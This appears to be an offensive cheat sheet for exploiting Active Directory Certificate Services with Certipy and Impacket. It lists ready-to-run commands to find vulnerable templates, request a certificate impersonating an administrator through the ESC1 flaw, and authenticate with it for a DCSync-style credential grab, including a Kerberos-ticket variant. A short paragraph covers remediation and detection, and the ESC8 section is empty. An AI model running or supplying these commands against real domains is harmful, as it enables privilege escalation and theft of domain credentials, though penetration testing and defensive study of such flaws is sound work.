ADCS Exploitation
Install
pipx install git+https://github.com/ly4k/Certipy

Locate Vulnerable Templates
certipy find -u $ADUSER@$ADDOMAIN -dc-ip $ADCONTROLLER -stdout -vulnerable

Privilege Escalation Vulnerabilities
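ESC1
ESC1 is a template misconfiguration: the template allows client authentication, lets the enrollee supply the subject alternative name (SAN), and grants enrollment rights to low-privileged users. To remediate, disable the enrollee-supplied subject option or require manager approval on the template, and restrict enrollment rights. If CA auditing is enabled, review certificate request/issuance events (4886/4887) for requests whose SAN does not match the requester.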
# Request Cert
certipy req -u $ADUSER@$ADDOMAIN -ca <CA> -template <TEMPLATE NAME> -upn <UPN>
# Use Cert for DCSync attack on SAN (upn)
sudo certipy auth -pfx <administrator.pfx> -dc-ip $ADCONTROLLER

# Get Kerberos TGT
impacket-getTGT $ADDOMAIN/$ADUSER -dc-ip <DC>
export KRB5CCNAME=$ADUSER.ccache
# Request Cert
certipy req -k -no-pass -target ADCS-01.EXAMPLE.COM -ca ADCS-01 -template 'Temp-User' -upn <UPN>
# Use Cert for DCSync attack on SAN (upn)
sudo certipy auth -pfx <administrator.pfx> -dc-ip $ADCONTROLLER

ESC8
References